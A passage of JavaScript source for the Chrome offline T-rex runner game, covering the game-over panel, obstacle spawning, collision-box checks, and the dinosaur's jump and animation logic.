 * @param {boolean=} opt_altGameActive
 * @constructor
 */
function GameOverPanel(
    canvas, textImgPos, restartImgPos, dimensions, opt_altGameEndImgPos,
    opt_altGameActive) {
  this.canvas = canvas;
  this.canvasCtx =
      /** @type {CanvasRenderingContext2D} */ (canvas.getContext('2d'));
  this.canvasDimensions = dimensions;
  this.textImgPos = textImgPos;
  this.restartImgPos = restartImgPos;
  this.altGameEndImgPos = opt_altGameEndImgPos;
  this.altGameModeActive = opt_altGameActive;

  // Retry animation.
  this.frameTimeStamp = 0;
  this.animTimer = 0;
  this.currentFrame = 0;

  this.gameOverRafId = null;

  this.flashTimer = 0;
  this.flashCounter = 0;
  this.originalText = true;
}

GameOverPanel.RESTART_ANIM_DURATION = 875;
GameOverPanel.LOGO_PAUSE_DURATION = 875;
GameOverPanel.FLASH_ITERATIONS = 5;

/**
 * Animation frames spec.
 */
GameOverPanel.animConfig = {
  frames: [0, 36, 72, 108, 144, 180, 216, 252],
  msPerFrame: GameOverPanel.RESTART_ANIM_DURATION / 8,
};

/**
 * Dimensions used in the panel.
 * @enum {number}
 */
GameOverPanel.dimensions = {
  TEXT_X: 0,
  TEXT_Y: 13,
  TEXT_WIDTH: 191,
  TEXT_HEIGHT: 11,
  RESTART_WIDTH: 36,
  RESTART_HEIGHT: 32,
};


GameOverPanel.prototype = {
  /**
   * Update the panel dimensions.
   * @param {number} width New canvas width.
   * @param {number} opt_height Optional new canvas height.
   */
  updateDimensions(width, opt_height) {
    this.canvasDimensions.WIDTH = width;
    if (opt_height) {
      this.canvasDimensions.HEIGHT = opt_height;
    }
    this.currentFrame = GameOverPanel.animConfig.frames.length - 1;
  },

  drawGameOverText(dimensions, opt_useAltText) {
    const centerX = this.canvasDimensions.WIDTH / 2;
    let textSourceX = dimensions.TEXT_X;
    let textSourceY = dimensions.TEXT_Y;
    let textSourceWidth = dimensions.TEXT_WIDTH;
    let textSourceHeight = dimensions.TEXT_HEIGHT;

    const textTargetX = Math.round(centerX - (dimensions.TEXT_WIDTH / 2));
    const textTargetY = Math.round((this.canvasDimensions.HEIGHT - 25) / 3);
    const textTargetWidth = dimensions.TEXT_WIDTH;
    const textTargetHeight = dimensions.TEXT_HEIGHT;

    if (IS_HIDPI) {
      textSourceY *= 2;
      textSourceX *= 2;
      textSourceWidth *= 2;
      textSourceHeight *= 2;
    }

    if (!opt_useAltText) {
      textSourceX += this.textImgPos.x;
      textSourceY += this.textImgPos.y;
    }

    const spriteSource =
        opt_useAltText ? Runner.altCommonImageSprite : Runner.origImageSprite;

    this.canvasCtx.save();

    if (IS_RTL) {
      this.canvasCtx.translate(this.canvasDimensions.WIDTH, 0);
      this.canvasCtx.scale(-1, 1);
    }

    // Game over text from sprite.
    this.canvasCtx.drawImage(
        spriteSource, textSourceX, textSourceY, textSourceWidth,
        textSourceHeight, textTargetX, textTargetY, textTargetWidth,
        textTargetHeight);

    this.canvasCtx.restore();
  },

  /**
   * Draw additional adornments for alternative game types.
   */
  drawAltGameElements(tRex) {
    // Additional adornments.
    if (this.altGameModeActive && Runner.spriteDefinition.ALT_GAME_END_CONFIG) {
      const altGameEndConfig = Runner.spriteDefinition.ALT_GAME_END_CONFIG;

      let altGameEndSourceWidth = altGameEndConfig.WIDTH;
      let altGameEndSourceHeight = altGameEndConfig.HEIGHT;
      const altGameEndTargetX = tRex.xPos + altGameEndConfig.X_OFFSET;
      const altGameEndTargetY = tRex.yPos + altGameEndConfig.Y_OFFSET;

      if (IS_HIDPI) {
        altGameEndSourceWidth *= 2;
        altGameEndSourceHeight *= 2;
      }

      this.canvasCtx.drawImage(
          Runner.altCommonImageSprite, this.altGameEndImgPos.x,
          this.altGameEndImgPos.y, altGameEndSourceWidth,
          altGameEndSourceHeight, altGameEndTargetX, altGameEndTargetY,
          altGameEndConfig.WIDTH, altGameEndConfig.HEIGHT);
    }
  },

  /**
   * Draw restart button.
   */
  drawRestartButton() {
    const dimensions = GameOverPanel.dimensions;
    let framePosX = GameOverPanel.animConfig.frames[this.currentFrame];
    let restartSourceWidth = dimensions.RESTART_WIDTH;
    let restartSourceHeight = dimensions.RESTART_HEIGHT;
    const restartTargetX =
        (this.canvasDimensions.WIDTH / 2) - (dimensions.RESTART_WIDTH / 2);
    const restartTargetY = this.canvasDimensions.HEIGHT / 2;

    if (IS_HIDPI) {
      restartSourceWidth *= 2;
      restartSourceHeight *= 2;
      framePosX *= 2;
    }

    this.canvasCtx.save();

    if (IS_RTL) {
      this.canvasCtx.translate(this.canvasDimensions.WIDTH, 0);
      this.canvasCtx.scale(-1, 1);
    }

    this.canvasCtx.drawImage(
        Runner.origImageSprite, this.restartImgPos.x + framePosX,
        this.restartImgPos.y, restartSourceWidth, restartSourceHeight,
        restartTargetX, restartTargetY, dimensions.RESTART_WIDTH,
        dimensions.RESTART_HEIGHT);
    this.canvasCtx.restore();
  },


  /**
   * Draw the panel.
   * @param {boolean} opt_altGameModeActive
   * @param {!Trex} opt_tRex
   */
  draw(opt_altGameModeActive, opt_tRex) {
    if (opt_altGameModeActive) {
      this.altGameModeActive = opt_altGameModeActive;
    }

    this.drawGameOverText(GameOverPanel.dimensions, false);
    this.drawRestartButton();
    this.drawAltGameElements(opt_tRex);
    this.update();
  },

  /**
   * Update animation frames.
   */
  update() {
    const now = getTimeStamp();
    const deltaTime = now - (this.frameTimeStamp || now);

    this.frameTimeStamp = now;
    this.animTimer += deltaTime;
    this.flashTimer += deltaTime;

    // Restart Button
    if (this.currentFrame == 0 &&
        this.animTimer > GameOverPanel.LOGO_PAUSE_DURATION) {
      this.animTimer = 0;
      this.currentFrame++;
      this.drawRestartButton();
    } else if (
        this.currentFrame > 0 &&
        this.currentFrame < GameOverPanel.animConfig.frames.length) {
      if (this.animTimer >= GameOverPanel.animConfig.msPerFrame) {
        this.currentFrame++;
        this.drawRestartButton();
      }
    } else if (
        !this.altGameModeActive &&
        this.currentFrame == GameOverPanel.animConfig.frames.length) {
      this.reset();
      return;
    }

    // Game over text
    if (this.altGameModeActive &&
        Runner.spriteDefinitionByType.original.ALT_GAME_OVER_TEXT_CONFIG) {
      const altTextConfig =
          Runner.spriteDefinitionByType.original.ALT_GAME_OVER_TEXT_CONFIG;

      if (this.flashCounter < GameOverPanel.FLASH_ITERATIONS &&
          this.flashTimer > altTextConfig.FLASH_DURATION) {
        this.flashTimer = 0;
        this.originalText = !this.originalText;

        this.clearGameOverTextBounds();
        if (this.originalText) {
          this.drawGameOverText(GameOverPanel.dimensions, false);
          this.flashCounter++;
        } else {
          this.drawGameOverText(altTextConfig, true);
        }
      } else if (this.flashCounter >= GameOverPanel.FLASH_ITERATIONS) {
        this.reset();
        return;
      }
    }

    this.gameOverRafId = requestAnimationFrame(this.update.bind(this));
  },

  /**
   * Clear game over text.
   */
  clearGameOverTextBounds() {
    this.canvasCtx.save();

    this.canvasCtx.clearRect(
        Math.round(
            this.canvasDimensions.WIDTH / 2 -
            (GameOverPanel.dimensions.TEXT_WIDTH / 2)),
        Math.round((this.canvasDimensions.HEIGHT - 25) / 3),
        GameOverPanel.dimensions.TEXT_WIDTH,
        GameOverPanel.dimensions.TEXT_HEIGHT + 4);
    this.canvasCtx.restore();
  },

  reset() {
    if (this.gameOverRafId) {
      cancelAnimationFrame(this.gameOverRafId);
      this.gameOverRafId = null;
    }
    this.animTimer = 0;
    this.frameTimeStamp = 0;
    this.currentFrame = 0;
    this.flashTimer = 0;
    this.flashCounter = 0;
    this.originalText = true;
  },
};


//******************************************************************************

/**
 * Check for a collision.
 * @param {!Obstacle} obstacle
 * @param {!Trex} tRex T-rex object.
 * @param {CanvasRenderingContext2D=} opt_canvasCtx Optional canvas context for
 *    drawing collision boxes.
 * @return {Array<CollisionBox>|undefined}
 */
function checkForCollision(obstacle, tRex, opt_canvasCtx) {
  const obstacleBoxXPos = Runner.defaultDimensions.WIDTH + obstacle.xPos;

  // Adjustments are made to the bounding box as there is a 1 pixel white
  // border around the t-rex and obstacles.
  const tRexBox = new CollisionBox(
      tRex.xPos + 1,
      tRex.yPos + 1,
      tRex.config.WIDTH - 2,
      tRex.config.HEIGHT - 2);

  const obstacleBox = new CollisionBox(
      obstacle.xPos + 1,
      obstacle.yPos + 1,
      obstacle.typeConfig.width * obstacle.size - 2,
      obstacle.typeConfig.height - 2);

  // Debug outer box
  if (opt_canvasCtx) {
    drawCollisionBoxes(opt_canvasCtx, tRexBox, obstacleBox);
  }

  // Simple outer bounds check.
  if (boxCompare(tRexBox, obstacleBox)) {
    const collisionBoxes = obstacle.collisionBoxes;
    let tRexCollisionBoxes = [];

    if (Runner.isAltGameModeEnabled()) {
      tRexCollisionBoxes = Runner.spriteDefinition.TREX.COLLISION_BOXES;
    } else {
      tRexCollisionBoxes = tRex.ducking ? Trex.collisionBoxes.DUCKING :
                                          Trex.collisionBoxes.RUNNING;
    }

    // Detailed axis aligned box check.
    for (let t = 0; t < tRexCollisionBoxes.length; t++) {
      for (let i = 0; i < collisionBoxes.length; i++) {
        // Adjust the box to actual positions.
        const adjTrexBox =
            createAdjustedCollisionBox(tRexCollisionBoxes[t], tRexBox);
        const adjObstacleBox =
            createAdjustedCollisionBox(collisionBoxes[i], obstacleBox);
        const crashed = boxCompare(adjTrexBox, adjObstacleBox);

        // Draw boxes for debug.
        if (opt_canvasCtx) {
          drawCollisionBoxes(opt_canvasCtx, adjTrexBox, adjObstacleBox);
        }

        if (crashed) {
          return [adjTrexBox, adjObstacleBox];
        }
      }
    }
  }
}


/**
 * Adjust the collision box.
 * @param {!CollisionBox} box The original box.
 * @param {!CollisionBox} adjustment Adjustment box.
 * @return {CollisionBox} The adjusted collision box object.
 */
function createAdjustedCollisionBox(box, adjustment) {
  return new CollisionBox(
      box.x + adjustment.x,
      box.y + adjustment.y,
      box.width,
      box.height);
}


/**
 * Draw the collision boxes for debug.
 */
function drawCollisionBoxes(canvasCtx, tRexBox, obstacleBox) {
  canvasCtx.save();
  canvasCtx.strokeStyle = '#f00';
  canvasCtx.strokeRect(tRexBox.x, tRexBox.y, tRexBox.width, tRexBox.height);

  canvasCtx.strokeStyle = '#0f0';
  canvasCtx.strokeRect(obstacleBox.x, obstacleBox.y,
      obstacleBox.width, obstacleBox.height);
  canvasCtx.restore();
}


/**
 * Compare two collision boxes for a collision.
 * @param {CollisionBox} tRexBox
 * @param {CollisionBox} obstacleBox
 * @return {boolean} Whether the boxes intersected.
 */
function boxCompare(tRexBox, obstacleBox) {
  let crashed = false;
  const tRexBoxX = tRexBox.x;
  const tRexBoxY = tRexBox.y;

  const obstacleBoxX = obstacleBox.x;
  const obstacleBoxY = obstacleBox.y;

  // Axis-Aligned Bounding Box method.
  if (tRexBox.x < obstacleBoxX + obstacleBox.width &&
      tRexBox.x + tRexBox.width > obstacleBoxX &&
      tRexBox.y < obstacleBox.y + obstacleBox.height &&
      tRexBox.height + tRexBox.y > obstacleBox.y) {
    crashed = true;
  }

  return crashed;
}


//******************************************************************************

/**
 * Collision box object.
 * @param {number} x X position.
 * @param {number} y Y Position.
 * @param {number} w Width.
 * @param {number} h Height.
 * @constructor
 */
function CollisionBox(x, y, w, h) {
  this.x = x;
  this.y = y;
  this.width = w;
  this.height = h;
}


//******************************************************************************

/**
 * Obstacle.
 * @param {CanvasRenderingContext2D} canvasCtx
 * @param {ObstacleType} type
 * @param {Object} spriteImgPos Obstacle position in sprite.
 * @param {Object} dimensions
 * @param {number} gapCoefficient Mutipler in determining the gap.
 * @param {number} speed
 * @param {number=} opt_xOffset
 * @param {boolean=} opt_isAltGameMode
 * @constructor
 */
function Obstacle(
    canvasCtx, type, spriteImgPos, dimensions, gapCoefficient, speed,
    opt_xOffset, opt_isAltGameMode) {
  this.canvasCtx = canvasCtx;
  this.spritePos = spriteImgPos;
  this.typeConfig = type;
  this.gapCoefficient = Runner.slowDown ? gapCoefficient * 2 : gapCoefficient;
  this.size = getRandomNum(1, Obstacle.MAX_OBSTACLE_LENGTH);
  this.dimensions = dimensions;
  this.remove = false;
  this.xPos = dimensions.WIDTH + (opt_xOffset || 0);
  this.yPos = 0;
  this.width = 0;
  this.collisionBoxes = [];
  this.gap = 0;
  this.speedOffset = 0;
  this.altGameModeActive = opt_isAltGameMode;
  this.imageSprite = this.typeConfig.type == 'COLLECTABLE' ?
      Runner.altCommonImageSprite :
      this.altGameModeActive ? Runner.altGameImageSprite : Runner.imageSprite;

  // For animated obstacles.
  this.currentFrame = 0;
  this.timer = 0;

  this.init(speed);
}

/**
 * Coefficient for calculating the maximum gap.
 */
Obstacle.MAX_GAP_COEFFICIENT = 1.5;

/**
 * Maximum obstacle grouping count.
 */
Obstacle.MAX_OBSTACLE_LENGTH = 3;


Obstacle.prototype = {
  /**
   * Initialise the DOM for the obstacle.
   * @param {number} speed
   */
  init(speed) {
    this.cloneCollisionBoxes();

    // Only allow sizing if we're at the right speed.
    if (this.size > 1 && this.typeConfig.multipleSpeed > speed) {
      this.size = 1;
    }

    this.width = this.typeConfig.width * this.size;

    // Check if obstacle can be positioned at various heights.
    if (Array.isArray(this.typeConfig.yPos)) {
      const yPosConfig =
          IS_MOBILE ? this.typeConfig.yPosMobile : this.typeConfig.yPos;
      this.yPos = yPosConfig[getRandomNum(0, yPosConfig.length - 1)];
    } else {
      this.yPos = this.typeConfig.yPos;
    }

    this.draw();

    // Make collision box adjustments,
    // Central box is adjusted to the size as one box.
    //      ____        ______        ________
    //    _|   |-|    _|     |-|    _|       |-|
    //   | |<->| |   | |<--->| |   | |<----->| |
    //   | | 1 | |   | |  2  | |   | |   3   | |
    //   |_|___|_|   |_|_____|_|   |_|_______|_|
    //
    if (this.size > 1) {
      this.collisionBoxes[1].width = this.width - this.collisionBoxes[0].width -
          this.collisionBoxes[2].width;
      this.collisionBoxes[2].x = this.width - this.collisionBoxes[2].width;
    }

    // For obstacles that go at a different speed from the horizon.
    if (this.typeConfig.speedOffset) {
      this.speedOffset = Math.random() > 0.5 ? this.typeConfig.speedOffset :
                                               -this.typeConfig.speedOffset;
    }

    this.gap = this.getGap(this.gapCoefficient, speed);

    // Increase gap for audio cues enabled.
    if (Runner.audioCues) {
      this.gap *= 2;
    }
  },

  /**
   * Draw and crop based on size.
   */
  draw() {
    let sourceWidth = this.typeConfig.width;
    let sourceHeight = this.typeConfig.height;

    if (IS_HIDPI) {
      sourceWidth = sourceWidth * 2;
      sourceHeight = sourceHeight * 2;
    }

    // X position in sprite.
    let sourceX =
        (sourceWidth * this.size) * (0.5 * (this.size - 1)) + this.spritePos.x;

    // Animation frames.
    if (this.currentFrame > 0) {
      sourceX += sourceWidth * this.currentFrame;
    }

    this.canvasCtx.drawImage(
        this.imageSprite, sourceX, this.spritePos.y, sourceWidth * this.size,
        sourceHeight, this.xPos, this.yPos, this.typeConfig.width * this.size,
        this.typeConfig.height);
  },

  /**
   * Obstacle frame update.
   * @param {number} deltaTime
   * @param {number} speed
   */
  update(deltaTime, speed) {
    if (!this.remove) {
      if (this.typeConfig.speedOffset) {
        speed += this.speedOffset;
      }
      this.xPos -= Math.floor((speed * FPS / 1000) * deltaTime);

      // Update frame
      if (this.typeConfig.numFrames) {
        this.timer += deltaTime;
        if (this.timer >= this.typeConfig.frameRate) {
          this.currentFrame =
              this.currentFrame === this.typeConfig.numFrames - 1 ?
              0 :
              this.currentFrame + 1;
          this.timer = 0;
        }
      }
      this.draw();

      if (!this.isVisible()) {
        this.remove = true;
      }
    }
  },

  /**
   * Calculate a random gap size.
   * - Minimum gap gets wider as speed increses
   * @param {number} gapCoefficient
   * @param {number} speed
   * @return {number} The gap size.
   */
  getGap(gapCoefficient, speed) {
    const minGap = Math.round(
        this.width * speed + this.typeConfig.minGap * gapCoefficient);
    const maxGap = Math.round(minGap * Obstacle.MAX_GAP_COEFFICIENT);
    return getRandomNum(minGap, maxGap);
  },

  /**
   * Check if obstacle is visible.
   * @return {boolean} Whether the obstacle is in the game area.
   */
  isVisible() {
    return this.xPos + this.width > 0;
  },

  /**
   * Make a copy of the collision boxes, since these will change based on
   * obstacle type and size.
   */
  cloneCollisionBoxes() {
    const collisionBoxes = this.typeConfig.collisionBoxes;

    for (let i = collisionBoxes.length - 1; i >= 0; i--) {
      this.collisionBoxes[i] = new CollisionBox(
          collisionBoxes[i].x, collisionBoxes[i].y, collisionBoxes[i].width,
          collisionBoxes[i].height);
    }
  },
};


//******************************************************************************
/**
 * T-rex game character.
 * @param {HTMLCanvasElement} canvas
 * @param {Object} spritePos Positioning within image sprite.
 * @constructor
 */
function Trex(canvas, spritePos) {
  this.canvas = canvas;
  this.canvasCtx =
      /** @type {CanvasRenderingContext2D} */ (canvas.getContext('2d'));
  this.spritePos = spritePos;
  this.xPos = 0;
  this.yPos = 0;
  this.xInitialPos = 0;
  // Position when on the ground.
  this.groundYPos = 0;
  this.currentFrame = 0;
  this.currentAnimFrames = [];
  this.blinkDelay = 0;
  this.blinkCount = 0;
  this.animStartTime = 0;
  this.timer = 0;
  this.msPerFrame = 1000 / FPS;
  this.config = Object.assign(Trex.config, Trex.normalJumpConfig);
  // Current status.
  this.status = Trex.status.WAITING;
  this.jumping = false;
  this.ducking = false;
  this.jumpVelocity = 0;
  this.reachedMinHeight = false;
  this.speedDrop = false;
  this.jumpCount = 0;
  this.jumpspotX = 0;
  this.altGameModeEnabled = false;
  this.flashing = false;

  this.init();
}


/**
 * T-rex player config.
 */
Trex.config = {
  DROP_VELOCITY: -5,
  FLASH_OFF: 175,
  FLASH_ON: 100,
  HEIGHT: 47,
  HEIGHT_DUCK: 25,
  INTRO_DURATION: 1500,
  SPEED_DROP_COEFFICIENT: 3,
  SPRITE_WIDTH: 262,
  START_X_POS: 50,
  WIDTH: 44,
  WIDTH_DUCK: 59,
};

Trex.slowJumpConfig = {
  GRAVITY: 0.25,
  MAX_JUMP_HEIGHT: 50,
  MIN_JUMP_HEIGHT: 45,
  INITIAL_JUMP_VELOCITY: -20,
};

Trex.normalJumpConfig = {
  GRAVITY: 0.6,
  MAX_JUMP_HEIGHT: 30,
  MIN_JUMP_HEIGHT: 30,
  INITIAL_JUMP_VELOCITY: -10,
};

/**
 * Used in collision detection.
 * @enum {Array<CollisionBox>}
 */
Trex.collisionBoxes = {
  DUCKING: [new CollisionBox(1, 18, 55, 25)],
  RUNNING: [
    new CollisionBox(22, 0, 17, 16),
    new CollisionBox(1, 18, 30, 9),
    new CollisionBox(10, 35, 14, 8),
    new CollisionBox(1, 24, 29, 5),
    new CollisionBox(5, 30, 21, 4),
    new CollisionBox(9, 34, 15, 4),
  ],
};


/**
 * Animation states.
 * @enum {string}
 */
Trex.status = {
  CRASHED: 'CRASHED',
  DUCKING: 'DUCKING',
  JUMPING: 'JUMPING',
  RUNNING: 'RUNNING',
  WAITING: 'WAITING',
};

/**
 * Blinking coefficient.
 * @const
 */
Trex.BLINK_TIMING = 7000;


/**
 * Animation config for different states.
 * @enum {Object}
 */
Trex.animFrames = {
  WAITING: {
    frames: [44, 0],
    msPerFrame: 1000 / 3,
  },
  RUNNING: {
    frames: [88, 132],
    msPerFrame: 1000 / 12,
  },
  CRASHED: {
    frames: [220],
    msPerFrame: 1000 / 60,
  },
  JUMPING: {
    frames: [0],
    msPerFrame: 1000 / 60,
  },
  DUCKING: {
    frames: [264, 323],
    msPerFrame: 1000 / 8,
  },
};


Trex.prototype = {
  /**
   * T-rex player initaliser.
   * Sets the t-rex to blink at random intervals.
   */
  init() {
    this.groundYPos = Runner.defaultDimensions.HEIGHT - this.config.HEIGHT -
        Runner.config.BOTTOM_PAD;
    this.yPos = this.groundYPos;
    this.minJumpHeight = this.groundYPos - this.config.MIN_JUMP_HEIGHT;

    this.draw(0, 0);
    this.update(0, Trex.status.WAITING);
  },

  /**
   * Assign the appropriate jump parameters based on the game speed.
   */
  enableSlowConfig: function() {
    const jumpConfig =
        Runner.slowDown ? Trex.slowJumpConfig : Trex.normalJumpConfig;
    Trex.config = Object.assign(Trex.config, jumpConfig);

    this.adjustAltGameConfigForSlowSpeed();
  },

  /**
   * Enables the alternative game. Redefines the dino config.
   * @param {Object} spritePos New positioning within image sprite.
   */
  enableAltGameMode: function(spritePos) {
    this.altGameModeEnabled = true;
    this.spritePos = spritePos;
    const spriteDefinition = Runner.spriteDefinition['TREX'];

    // Update animation frames.
    Trex.animFrames.RUNNING.frames =
        [spriteDefinition.RUNNING_1.x, spriteDefinition.RUNNING_2.x];
    Trex.animFrames.CRASHED.frames = [spriteDefinition.CRASHED.x];

    if (typeof spriteDefinition.JUMPING.x == 'object') {
      Trex.animFrames.JUMPING.frames = spriteDefinition.JUMPING.x;
    } else {
      Trex.animFrames.JUMPING.frames = [spriteDefinition.JUMPING.x];
    }

    Trex.animFrames.DUCKING.frames =
        [spriteDefinition.RUNNING_1.x, spriteDefinition.RUNNING_2.x];

    // Update Trex config
    Trex.config.GRAVITY = spriteDefinition.GRAVITY || Trex.config.GRAVITY;
    Trex.config.HEIGHT = spriteDefinition.RUNNING_1.h,
    Trex.config.INITIAL_JUMP_VELOCITY = spriteDefinition.INITIAL_JUMP_VELOCITY;
    Trex.config.MAX_JUMP_HEIGHT = spriteDefinition.MAX_JUMP_HEIGHT;
    Trex.config.MIN_JUMP_HEIGHT = spriteDefinition.MIN_JUMP_HEIGHT;
    Trex.config.WIDTH = spriteDefinition.RUNNING_1.w;
    Trex.config.WIDTH_JUMP = spriteDefinition.JUMPING.w;
    Trex.config.INVERT_JUMP = spriteDefinition.INVERT_JUMP;

    this.adjustAltGameConfigForSlowSpeed(spriteDefinition.GRAVITY);
    this.config = Trex.config;

    // Adjust bottom horizon placement.
    this.groundYPos = Runner.defaultDimensions.HEIGHT - this.config.HEIGHT -
        Runner.spriteDefinition['BOTTOM_PAD'];
    this.yPos = this.groundYPos;
    this.reset();
  },

  /**
   * Slow speeds adjustments for the alt game modes.
   * @param {number=} opt_gravityValue
   */
  adjustAltGameConfigForSlowSpeed: function(opt_gravityValue) {
    if (Runner.slowDown) {
      if (opt_gravityValue) {
        Trex.config.GRAVITY = opt_gravityValue / 1.5;
      }
      Trex.config.MIN_JUMP_HEIGHT *= 1.5;
      Trex.config.MAX_JUMP_HEIGHT *= 1.5;
      Trex.config.INITIAL_JUMP_VELOCITY =
          Trex.config.INITIAL_JUMP_VELOCITY * 1.5;
    }
  },

  /**
   * Setter whether dino is flashing.
   * @param {boolean} status
   */
  setFlashing: function(status) {
    this.flashing = status;
  },

  /**
   * Setter for the jump velocity.
   * The approriate drop velocity is also set.
   * @param {number} setting
   */
  setJumpVelocity(setting) {
    this.config.INITIAL_JUMP_VELOCITY = -setting;
    this.config.DROP_VELOCITY = -setting / 2;
  },

  /**
   * Set the animation status.
   * @param {!number} deltaTime
   * @param {Trex.status=} opt_status Optional status to switch to.
   */
  update(deltaTime, opt_status) {
    this.timer += deltaTime;

    // Update the status.
    if (opt_status) {
      this.status = opt_status;
      this.currentFrame = 0;
      this.msPerFrame = Trex.animFrames[opt_status].msPerFrame;
      this.currentAnimFrames = Trex.animFrames[opt_status].frames;

      if (opt_status === Trex.status.WAITING) {
        this.animStartTime = getTimeStamp();
        this.setBlinkDelay();
      }
    }
    // Game intro animation, T-rex moves in from the left.
    if (this.playingIntro && this.xPos < this.config.START_X_POS) {
      this.xPos += Math.round((this.config.START_X_POS /
          this.config.INTRO_DURATION) * deltaTime);
      this.xInitialPos = this.xPos;
    }

    if (this.status === Trex.status.WAITING) {
      this.blink(getTimeStamp());
    } else {
      this.draw(this.currentAnimFrames[this.currentFrame], 0);
    }

    // Update the frame position.
    if (!this.flashing && this.timer >= this.msPerFrame) {
      this.currentFrame = this.currentFrame ==
          this.currentAnimFrames.length - 1 ? 0 : this.currentFrame + 1;
      this.timer = 0;
    }

    if (!this.altGameModeEnabled) {
      // Speed drop becomes duck if the down key is still being pressed.
      if (this.speedDrop && this.yPos === this.groundYPos) {
        this.speedDrop = false;
        this.setDuck(true);
      }
    }
  },

  /**
   * Draw the t-rex to a particular position.
   * @param {number} x
   * @param {number} y
   */
  draw(x, y) {
    let sourceX = x;
    let sourceY = y;
    let sourceWidth = this.ducking && this.status !== Trex.status.CRASHED ?
        this.config.WIDTH_DUCK :
        this.config.WIDTH;
    let sourceHeight = this.config.HEIGHT;
    const outputHeight = sourceHeight;

    let jumpOffset = Runner.spriteDefinition.TREX.JUMPING.xOffset;

    // Width of sprite changes on jump.
    if (this.altGameModeEnabled && this.jumping &&
        this.status !== Trex.status.CRASHED) {
      sourceWidth = this.config.WIDTH_JUMP;
    }

    if (IS_HIDPI) {
      sourceX *= 2;
      sourceY *= 2;
      sourceWidth *= 2;
      sourceHeight *= 2;
      jumpOffset *= 2;
    }

    // Adjustments for sprite sheet position.
    sourceX += this.spritePos.x;
    sourceY += this.spritePos.y;

    // Flashing.
    if (this.flashing) {
      if (this.timer < this.config.FLASH_ON) {
        this.canvasCtx.globalAlpha = 0.5;
      } else if (this.timer > this.config.FLASH_OFF) {
        this.timer = 0;
      }
    }

    // Ducking.
    if (!this.altGameModeEnabled && this.ducking &&
        this.status !== Trex.status.CRASHED) {
      this.canvasCtx.drawImage(Runner.imageSprite, sourceX, sourceY,
          sourceWidth, sourceHeight,
          this.xPos, this.yPos,
          this.config.WIDTH_DUCK, outputHeight);
    } else if (
        this.altGameModeEnabled && this.jumping &&
        this.status !== Trex.status.CRASHED) {
      // Jumping with adjustments.
      this.canvasCtx.drawImage(
          Runner.imageSprite, sourceX, sourceY, sourceWidth, sourceHeight,
          this.xPos - jumpOffset, this.yPos, this.config.WIDTH_JUMP,
          outputHeight);
    } else {
      // Crashed whilst ducking. Trex is standing up so needs adjustment.
      if (this.ducking && this.status === Trex.status.CRASHED) {
        this.xPos++;
      }
      // Standing / running
      this.canvasCtx.drawImage(Runner.imageSprite, sourceX, sourceY,
          sourceWidth, sourceHeight,
          this.xPos, this.yPos,
          this.config.WIDTH, outputHeight);
    }
    this.canvasCtx.globalAlpha = 1;
  },

  /**
   * Sets a random time for the blink to happen.
   */
  setBlinkDelay() {
    this.blinkDelay = Math.ceil(Math.random() * Trex.BLINK_TIMING);
  },

  /**
   * Make t-rex blink at random intervals.
   * @param {number} time Current time in milliseconds.
   */
  blink(time) {
    const deltaTime = time - this.animStartTime;

    if (deltaTime >= this.blinkDelay) {
      this.draw(this.currentAnimFrames[this.currentFrame], 0);

      if (this.currentFrame === 1) {
        // Set new random delay to blink.
        this.setBlinkDelay();
        this.animStartTime = time;
        this.blinkCount++;
      }
    }
  },

  /**
   * Initialise a jump.
   * @param {number} speed
   */
  startJump(speed) {
    if (!this.jumping) {
      this.update(0, Trex.status.JUMPING);
      // Tweak the jump velocity based on the speed.
      this.jumpVelocity = this.config.INITIAL_JUMP_VELOCITY - (speed / 10);
      this.jumping = true;
      this.reachedMinHeight = false;
      this.speedDrop = false;

      if (this.config.INVERT_JUMP) {
        this.minJumpHeight = this.groundYPos + this.config.MIN_JUMP_HEIGHT;
      }
    }
  },

  /**
   * Jump is complete, falling down.
   */
  endJump() {
    if (this.reachedMinHeight &&
        this.jumpVelocity < this.config.DROP_VELOCITY) {
      this.jumpVelocity = this.config.DROP_VELOCITY;
    }
  },

  /**
   * Update frame for a jump.
   * @param {number} deltaTime
   */
  updateJump(deltaTime) {
    const msPerFrame = Trex.animFrames[this.status].msPerFrame;
    const framesElapsed = deltaTime / msPerFrame;

    // Speed drop makes Trex fall faster.
    if (this.speedDrop) {
      this.yPos += Math.round(this.jumpVelocity *
          this.config.SPEED_DROP_COEFFICIENT * framesElapsed);
    } else if (this.config.INVERT_JUMP) {
      this.yPos -= Math.round(this.jumpVelocity * framesElapsed);
    } else {
      this.yPos += Math.round(this.jumpVelocity * framesElapsed);
    }

    this.jumpVelocity += this.config.GRAVITY * framesElapsed;

    // Minimum height has been reached.
    if (this.config.INVERT_JUMP && (this.yPos > this.minJumpHeight) ||
        !this.config.INVERT_JUMP && (this.yPos < this.minJumpHeight) ||
        this.speedDrop) {
      this.reachedMinHeight = true;
    }

    // Reached max height.
    if (this.config.INVERT_JUMP && (this.yPos > -this.config.MAX_JUMP_HEIGHT) ||
        !this.config.INVERT_JUMP && (this.yPos < this.config.MAX_JUMP_HEIGHT) ||
        this.speedDrop) {
      this.endJump();
    }

    // Back down at ground level. Jump completed.
    if ((this.config.INVERT_JUMP && this.yPos) < this.groundYPos ||
        (!this.config.INVERT_JUMP && this.yPos) > this.groundYPos) {
      this.reset();
      this.jumpCount++;

      if (Runner.audioCues) {
        Runner.generatedSoundFx.loopFootSteps();
      }
    }
  },

  /**
   * Set the speed drop. Immediately cancels the current jump.
   */
  setSpeedDrop() {
    this.speedDrop = true;
    this.jumpVelocity = 1;
  },

  /**
   * @param {boolean} isDucking
   */
  setDuck(isDucking) {
    if (isDucking && this.status !== Trex.status.DUCKING) {
      this.update(0, Trex.status.DUCKING);
      this.ducking = true;
    } else if (this.status === Trex.status.DUCKING) {
      this.update(0, Trex.status.RUNNING);
      this.ducking = false;
    }
  },

  /**
   * Reset the t-rex to running at start of game.
   */
  reset() {
    this.xPos = this.xInitialPos;
    this.yPos = this.groundYPos;
    this.jumpVelocity = 0;
    this.jumping = false;
    this.ducking = false;
    this.update(0, Trex.status.RUNNING);
    this.midair = false;
    this.speedDrop = false;
    this.jumpCount = 0;
  },
};


//******************************************************************************

/**
 * Handles displaying the distance meter.
 * @param {!HTMLCanvasElement} canvas
 * @param {Object} spritePos Image position in sprite.
 * @param {number} canvasWidth
 * @constructor
 */
function DistanceMeter(canvas, spritePos, canvasWidth) {
  this.canvas = canvas;
  this.canvasCtx =
      /** @type {CanvasRenderingContext2D} */ (canvas.getContext('2d'));
  this.image = Runner.imageSprite;
  this.spritePos = spritePos;
  this.x = 0;
  this.y = 5;

  this.currentDistance = 0;
